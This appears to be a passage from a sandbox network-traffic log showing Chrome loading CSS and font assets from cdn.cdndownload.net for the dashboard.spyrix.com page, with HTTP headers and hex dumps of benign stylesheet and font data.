                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC583OUTGET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 97
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-61"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T20:35:34+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc72
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC97INData Raw: 2e 5f 36 70 74 63 2d 76 31 6f 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 65 54 55 74 31 76 53 4d 7b 67 61 70 3a 2e 34 65 6d 7d 0a
                                                                                                                                                                                                                                                          Data Ascii: ._6ptc-v1o{display:flex;justify-content:center;align-items:center;width:100%}.eTUt1vSM{gap:.4em}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          22192.168.2.75503195.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC640OUTGET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                          Referer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: font/woff2
                                                                                                                                                                                                                                                          Content-Length: 44112
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-ac50"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T02:12:28+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc41
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC3730INData Raw: 77 4f 46 32 00 01 00 00 00 00 ac 50 00 10 00 00 00 02 04 b8 00 00 ab ea 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 84 32 1b 82 8f 72 1c 9a 08 06 60 3f 53 54 41 54 48 00 95 2a 11 08 0a 84 b9 34 83 cb 41 0b 91 16 00 01 36 02 24 03 a1 38 04 20 05 87 5e 07 cd 35 0c 07 5b 12 c4 91 05 d6 c6 b6 43 35 a0 e0 fb c0 74 1b 02 64 5f c3 a3 3a 1f ef c5 01 e6 a6 8e 15 fd 6e 1b 00 b8 75 3d 69 58 01 37 46 6e b7 03 28 ea bc 2e bd ec ff ff ff ff ff d7 24 0b 19 db fd 33 fe f7 bf 81 93 29 e8 10 32 ad d2 82 30 aa d0 08 83 bb 23 65 32 60 34 1b 0f e5 98 90 a4 4c 1e 89 c1 1d f5 64 38 93 79 b9 8c c5 8e 10 5c 9b b3 a9 ae 44 92 e1 16 ce fb 30 58 a0 1c 7e 66 cb b6 2d 10 89 88 7c e3 85 97 60 93 a7 fd 32 a3 69 84 7e 4c c4 4e ac f0 b3 b0 22 dd 85 bd 93 cf
                                                                                                                                                                                                                                                          Data Ascii: wOF2P2r`?STATH*4A6$8 ^5[C5td_:nu=iX7Fn(.$3)20#e2`4Ld8y\D0X~f-|`2i~LN"
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: b4 56 3a 47 e5 3c 38 c5 66 6d 00 66 b6 0a a6 7f c6 4f aa 48 6e 63 20 66 3f 51 ea 3b dd db 46 b1 50 8c 4e a8 cc 06 3a b4 41 dc c4 5d 6c f1 0e ef a5 6c 06 d0 21 b0 25 83 7b 6d 27 e6 7b 6b 5c f0 40 9e d6 42 d1 68 47 af 5d 29 41 77 48 b4 0a f1 14 eb bb e5 63 e3 12 03 ee cf 9c 15 ef 06 77 31 7a 74 6e 6b 3f 9b 42 e5 61 71 a5 b2 d0 9e de 99 da b2 f5 12 70 b5 08 19 93 a6 1c 53 db bc 0d 4c b0 d0 43 b2 94 a9 be 92 3a a7 e2 a3 cd 2e 8a 66 d2 b8 04 50 35 63 14 b6 a5 b1 a9 3a db 06 6a d7 f3 10 0b b3 58 64 7c 45 4b 91 32 e4 ad dc 15 31 bf 95 0e 94 a9 b6 e7 58 1e c0 74 0d 28 25 32 5a 35 a2 2a 8e 68 55 0b 42 01 b1 93 7d ab 27 69 3f 2f 15 95 ab d7 3d b9 54 b9 6c 20 26 a8 c8 35 c0 4f 56 b3 7d ea da 45 12 92 1b db 3a 19 37 82 32 0d 40 eb e3 d2 c7 ec fa 8c 98 57 13 45 5a 44
                                                                                                                                                                                                                                                          Data Ascii: V:G<8fmfOHnc f?Q;FPN:A]ll!%{m'{k\@BhG])AwHcw1ztnk?BaqpSLC:.fP5c:jXd|EK21Xt(%2Z5*hUB}'i?/=Tl &5OV}E:72@WEZD
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: 5a dd 4b 10 c2 b2 ee 5f 70 1d 76 cd fa ec 56 60 31 eb 16 53 4b 37 2b 54 cd c5 de 8f 83 de c6 75 e3 4a 14 37 da 22 e1 70 ed d7 d8 04 b5 ef ff a8 e4 f7 cb d2 01 3d 02 ce 0c 5d 8c 4a a4 1a 4a 6b 05 22 db 51 8e 44 05 1a c1 0b 6b 6a e7 d5 b2 08 23 0b ec f3 97 a6 0a 88 75 d5 9d 55 37 43 c6 bd 57 0e 21 3e 0e ad 4e 97 01 7a 39 80 7c e3 3c ba 8a 3a f8 42 69 5c 80 30 e8 de bc 7d 5d bf a5 81 90 65 69 f4 bd ab ad 35 d4 fa eb 3b 3c c4 7d f5 37 af ae d3 e8 93 54 38 cb 16 88 75 cf 81 2e fd 51 9b 19 e8 a5 89 04 96 02 05 bb 02 03 0b 58 7a 7c e4 6b 5d 80 4b 9f 17 74 0b b0 ec 48 3f bd 77 29 9d 64 ec a1 07 44 ae 55 00 c8 4b 45 50 9b d0 f1 ad 54 b7 de 82 32 f6 70 de 6f 10 93 3b 8e f8 f2 6e 53 c9 02 01 1f a0 0b a0 51 ab ee 4e 9e 3e 60 44 b1 92 ee e1 04 5a 5a c9 da 7b c4 81 7d
                                                                                                                                                                                                                                                          Data Ascii: ZK_pvV`1SK7+TuJ7"p=]JJk"QDkj#uU7CW!>Nz9|<:Bi\0}]ei5;<}7T8u.QXz|k]KtH?w)dDUKEPT2po;nSQN>`DZZ{}
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: 5d f9 3a 54 54 b1 ce 95 2a af 5c 59 65 2a aa 60 af 46 cf 1a f4 ae 59 af 9a 6a d4 af 36 33 cb 35 b8 38 d3 cb b6 b8 e7 56 54 66 55 15 56 56 6e 43 75 b6 d6 6c 4b 4d 36 d5 60 7f 18 fb ea b2 b7 57 6e f4 de 95 de 38 da 80 eb bd 73 a9 69 d7 7a eb 6e 5f 3c 6e d1 13 6f fb e9 7d 1b de f5 cb c4 1e 3a d3 98 17 ad 09 14 1e 4d 27 5d ab d2 43 ff da 49 fd 0a 6a a4 af d0 9c 9e d0 16 03 86 f0 30 af 02 42 00 dc a8 61 90 9c 50 66 72 8d f2 68 59 d0 a8 52 cd 28 c7 ea 2a ad ad da f1 86 5c 8e 60 5b 2d 0e 84 e5 da 60 88 36 a6 74 8b 7a 66 6c 19 5e e5 d3 cb a0 d5 a8 4d c6 f3 4c 9f 55 67 d6 5b 2e 30 2d 33 34 53 34 dd e6 b8 50 45 53 5c 50 e5 76 e8 db f9 e0 6b 76 f0 8f 78 09 6c ac f4 d2 18 a5 33 a9 4a 65 16 c0 24 a5 81 c2 10 91 50 c5 49 44 43 c7 c0 26 23 a7 a4 a0 a2 96 2c 85 96 81 45
                                                                                                                                                                                                                                                          Data Ascii: ]:TT*\Ye*`FYj6358VTfUVVnCulKM6`Wn8sizn_<no}:M']CIj0BaPfrhYR(*\`[-`6tzfl^MLUg[.0-34S4PES\Pvkvxl3Je$PIDC&#,E
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: 1a a1 cc 93 1a c6 b8 cd 67 63 2a e4 a4 af c8 98 a7 64 aa 75 44 86 a6 3d 81 69 29 80 2d ab 0f bf 90 74 6f b1 32 c7 f6 3c 49 ce 39 0a 96 e4 14 f6 47 15 50 c7 fa 34 61 d9 e4 30 6c 89 7e ca d4 c4 18 3c f1 75 ec 53 a0 44 1b 57 0e f4 d5 ba a8 8b 79 87 12 56 15 4c a9 32 74 59 62 6b ad 49 aa 84 16 d3 d8 76 55 88 81 a3 c7 c4 74 45 2b 5b 21 ec 6b 92 e3 29 ce 98 8d ee e1 75 e9 75 7d a7 bb 04 5a 05 91 07 95 30 53 12 e7 73 53 da d9 6b de 97 9f cc 28 88 f0 1c bd 3a 81 96 33 e4 d7 06 35 31 0b bb 99 bd 48 23 a9 e9 f4 d2 97 31 6a 8a 94 30 9d 5e 01 99 d6 86 19 35 c6 d6 06 66 b4 2e c6 94 c7 d3 30 9a 22 b9 9a 0f 34 40 cd 06 c0 98 2b 11 d5 58 38 e5 60 0c e1 1d 58 c2 8a d2 16 af c3 0e b3 3d a0 30 af 9b d3 76 89 c1 0d 86 15 94 15 4e 01 f0 16 b9 e9 8f df a1 71 aa 64 5f 04 78 57
                                                                                                                                                                                                                                                          Data Ascii: gc*duD=i)-to2<I9GP4a0l~<uSDWyVL2tYbkIvUtE+[!k)uu}Z0SsSk(:351H#1j0^5f.0"4@+X8`X=0vNqd_xW
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC2043INData Raw: 8b 6a df 41 0c 62 4f da c6 34 57 55 8e 69 69 3b fe 1f a6 45 2b 0f 58 06 5c 0e a7 d1 f8 0f e4 31 0d 33 b2 07 f5 6a 42 f1 89 9a 23 34 55 55 8d 69 6e 3b d1 f9 96 f5 e1 77 7e bf cb e9 f4 3b fd df 01 f6 f5 15 7c a0 73 73 9e a9 fa 7d 2f cf 9a 20 2b fd 72 52 d6 80 ac b4 7c 6f d6 95 1b b5 f9 75 d2 cc 15 4c bc c5 3d 25 5f a7 c4 c0 08 52 32 ae f1 74 fd 77 b2 13 86 61 5a b4 ed 5b ab 1c 9b dd 9a 63 0b 7c 0b 24 42 96 07 b9 13 7f db 37 c5 f1 cc 7f f2 42 55 82 29 3f 6c 49 96 3c cc 00 6b b0 22 b4 30 df 2d e3 ba ad da a2 44 5d 7a 23 eb eb cd 5d c1 27 65 37 c7 86 e2 d4 1a 37 7d 2b 5f be c9 82 ab 21 56 62 a5 c1 0c 31 3b c3 aa 2e 89 07 b6 43 9d 4f 25 6f aa b4 dd 55 6e 7c 65 43 92 9c 2e bb c1 e8 35 fb 6b 60 05 02 33 c0 1c 8b d7 6c 4c cf 31 65 97 57 16 14 6d 9a 00 b7 ad 2d 39
                                                                                                                                                                                                                                                          Data Ascii: jAbO4WUii;E+X\13jB#4UUin;w~;|ss}/ +rR|ouL=%_R2twaZ[c|$B7BU)?lI<k"0-D]z#]'e77}+_!Vb1;.CO%oUn|eC.5k`3lL1eWm-9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: e5 a3 9c 78 3d ee e6 5f 33 a8 cc df 44 8e cc 1c cf 49 2c a4 25 37 c4 f7 ad 23 c7 34 68 b2 68 63 78 49 f1 0b 2a 56 3c 07 e3 ae 1d 71 93 cc 36 8d 48 6c f2 73 00 10 3a 37 9f eb d5 7d b2 22 30 04 d1 11 6b 07 16 64 3b bc 63 9c ac 74 65 dc 6b dd 3b 2d ba 29 7a c2 f7 08 ae 7f fd ae 6a e0 b5 24 cd 2d 4c 0a 99 70 44 c5 c2 12 63 4d 6d 06 a3 27 c7 f6 32 16 63 e8 3d 59 2b e4 a1 76 ac e0 5c 6a be 01 29 14 b3 0d 5e f7 ec 19 7c 82 99 95 0f 1d d1 4c 06 87 40 87 8d 69 9e e9 45 e8 a1 0b c7 7f 96 ac 2f a5 7e 09 00 25 ad b5 62 82 41 fb e8 87 6a be a2 21 1a 00 c8 fc b3 fe ad f3 9b 75 e9 04 38 b1 6c fd 93 f8 8d 03 65 89 08 0c f1 8b b7 17 55 ac 03 be 88 90 79 1d 0b 8a 7c 19 06 08 92 04 66 e6 53 e6 ce 2d f3 22 70 89 6f 56 3e 79 f6 bc 32 3d 08 43 d4 e2 05 45 e5 eb e8 91 cf ca e7
                                                                                                                                                                                                                                                          Data Ascii: x=_3DI,%7#4hhcxI*V<q6Hls:7}"0kd;ctek;-)zj$-LpDcMm'2c=Y+v\j)^|L@iE/~%bAj!u8leUy|fS-"poV>y2=CE
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: 09 71 64 d8 70 53 52 10 0b 00 2b 66 55 ed 3f a0 37 03 56 22 c8 8a f1 af 29 b1 c8 aa 17 81 f0 09 e3 66 8e b5 e3 f6 31 cf a4 70 c4 7d d3 e0 ef 53 c3 d3 da 86 2c 53 7f 13 c0 8a 7d 7d 5b b9 1b 9f 3d 21 78 54 f0 79 52 a3 bd 75 69 57 95 d0 d1 b1 b2 67 45 14 0e 99 49 f8 3f 6a c5 ca dd fd 2e 41 e5 e1 65 b6 d6 46 de a7 60 4d 6f f6 04 ca a7 59 09 e9 5f 63 76 2c 71 f0 a2 ed 54 39 15 18 4a 84 fe be ad f3 5b 52 64 04 38 b1 6d fd 93 f8 be b4 1e b3 66 3e 9c 4d 8b 2e f9 e3 52 54 ed f0 49 ea f6 f9 c0 58 9d 60 63 93 0d a6 43 20 1d b6 ed 50 18 62 82 2c 3a 83 f0 db 8a 2e 58 1a 6d 76 ad 6b 93 04 50 74 fd cc 7e 68 c8 ba 63 2b bf 84 cc 32 83 4b 69 32 da 7d 7e 87 9d a0 f9 51 78 7e 89 e5 ff 09 e4 95 1b 4c 69 1e 41 52 ae dd a8 8f 2b b4 a6 03 f2 fa a9 f4 18 52 3f 8d 2b 86 5a 9f 35
                                                                                                                                                                                                                                                          Data Ascii: qdpSR+fU?7V")f1p}S,S}}[=!xTyRuiWgEI?j.AeF`MoY_cv,qT9J[Rd8mf>M.RTIX`cC Pb,:.XmvkPt~hc+2Ki2}~Qx~LiAR+R?+Z5
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: 68 ac 11 35 d7 4e 14 99 55 0d 76 65 42 50 6b ca e2 ff 72 ab 3d d9 fe 5a f8 7c 1f f9 fa a2 8a 9c db a6 93 ad 03 30 ee b7 ab 89 16 41 4e a8 22 93 36 77 ed 0d d3 39 55 c7 a2 d7 7e 2a df 5a 09 b1 81 a6 61 e8 37 93 f6 b8 b7 51 34 25 b7 de b8 b8 23 ec 19 46 a3 77 08 fe 8a 81 89 26 6a 51 f3 a1 1f 75 27 d9 e3 a9 f1 63 c2 35 71 27 7d b6 71 dd 9d c5 dc 8e 27 f2 2d 1f 32 e4 6b 94 cc 19 f7 d3 66 e2 ff 65 dc a5 f7 eb 04 7a bc 7f 82 3a bd a5 86 83 f8 ea 71 0b 73 e0 93 92 f5 c2 58 20 8e 3d dd f0 65 4b 9c 47 28 a2 7a c6 6d cd a4 4c 9f 46 5d b6 ec 66 56 bc 50 98 11 f7 7b ed b2 aa e9 4b e2 b6 4c 1f 5f 2a 4b 24 8a f3 cc 2d 59 4a 5d 32 2a 6e fa f4 1b 99 1d 2c f3 ff be 6c da 84 e7 61 69 96 4c e4 53 28 4c d4 2c f9 45 a9 5b 26 0e 40 fc 4d 24 03 34 c3 10 1b ac 84 ed 40 87 57 ef
                                                                                                                                                                                                                                                          Data Ascii: h5NUveBPkr=Z|0AN"6w9U~*Za7Q4%#Fw&jQu'c5q'}q'-2kfez:qsX =eKG(zmLF]fVP{KL_*K$-YJ]2*n,laiLS(L,E[&@M$4@W
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC4096INData Raw: 9e 42 c0 e8 74 10 8f 1f 70 45 7d 5c 4f dc 07 e8 42 dd 78 a3 e3 3f 54 38 26 31 0e 7c 4c 3f cb 0b d6 ce 84 de b3 45 c6 5a 9a ea 4d 7f 32 cb cc 8b f3 6a 99 7f 9a ea 3f 36 ea d8 88 ed 1e b6 1c 30 1b ff 1c 4b 65 8c e4 80 60 13 39 a6 7c fd ec 2f 3a 41 e9 f1 57 55 98 94 c5 a4 16 9d a8 23 c6 9e 01 fc 83 2c eb 5c 2b 84 a5 12 a3 68 83 60 76 d4 ab be 11 79 e0 03 e2 0f 22 2b ff 7d 05 69 1e b8 4b 89 81 a4 8c d7 22 d1 6b 5e 86 25 f1 12 6e e0 49 42 5d 1e 9f 9f 57 97 70 07 80 f0 90 32 90 2f 27 31 57 4e 5f 48 fd 06 13 26 bb cb 0b fc 70 40 80 c5 f0 c5 43 5a 0a 14 df 63 9d 46 22 4d f5 d1 46 91 c8 a3 8e 93 52 29 89 9c 1c c0 ff 9c ce fe 6b 50 ef f6 56 4c a7 49 a4 2d 94 b6 3d 3d e6 35 00 9e 23 54 be 5a df e6 7f f3 cd 37 eb 91 b8 97 04 3c 0d 1b f1 60 5e 5f 8c 45 15 13 1d eb 55
                                                                                                                                                                                                                                                          Data Ascii: BtpE}\OBx?T8&1|L?EZM2j?60Ke`9|/:AWU#,\+h`vy"+}iK"k^%nIB]Wp2/'1WN_H&p@CZcF"MFR)kPVLI-==5#TZ7<`^_EU


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          23192.168.2.75504195.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC579OUTGET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 193
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-c1"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T20:35:34+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc72
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC193INData Raw: 2e 76 61 4a 67 37 58 47 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 66 6c 65 78 3a 31 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 6d 74 78 46 75 75 71 6f 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 4d 74 41 55 6d 34 72 64 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 29 7d 0a
                                                                                                                                                                                                                                                          Data Ascii: .vaJg7XGf{display:inline;min-width:0;width:100%;flex:1;text-align:center;justify-content:center}.mtxFuuqo{color:inherit;text-align:center;justify-content:center}.MtAUm4rd{color:var(--primary)}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          24192.168.2.75503995.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC574OUTGET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 1513
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-5e9"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:21:08+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc11
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC1513INData Raw: 2e 5f 35 6b 4c 34 54 50 64 44 7b 7a 2d 69 6e 64 65 78 3a 76 61 72 28 2d 2d 7a 2d 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 29 7d 2e 65 6f 50 78 2d 58 66 4c 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 2d 75 46 45 45 65 68 62 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 76 61 72 28 2d 2d 7a 2d 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 29 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 38 30 7d 2e 66 4d 6f 33 5a 56 45 6c 7b 64 69 72 65 63 74 69 6f 6e 3a 72 74 6c 7d 2e 5f 36 73 50 77 61 78 79 43 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74
                                                                                                                                                                                                                                                          Data Ascii: ._5kL4TPdD{z-index:var(--z-modal-backdrop)}.eoPx-XfL{opacity:0}.-uFEEehb{position:fixed;width:100%;z-index:var(--z-modal-backdrop);height:100%;left:0;top:0;opacity:1;background-color:#00000080}.fMo3ZVEl{direction:rtl}._6sPwaxyC{position:fixed;top:50%;left


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          25192.168.2.75503795.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC574OUTGET /dashboard30/assets/Input-34212571.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC302INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Content-Length: 3065
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
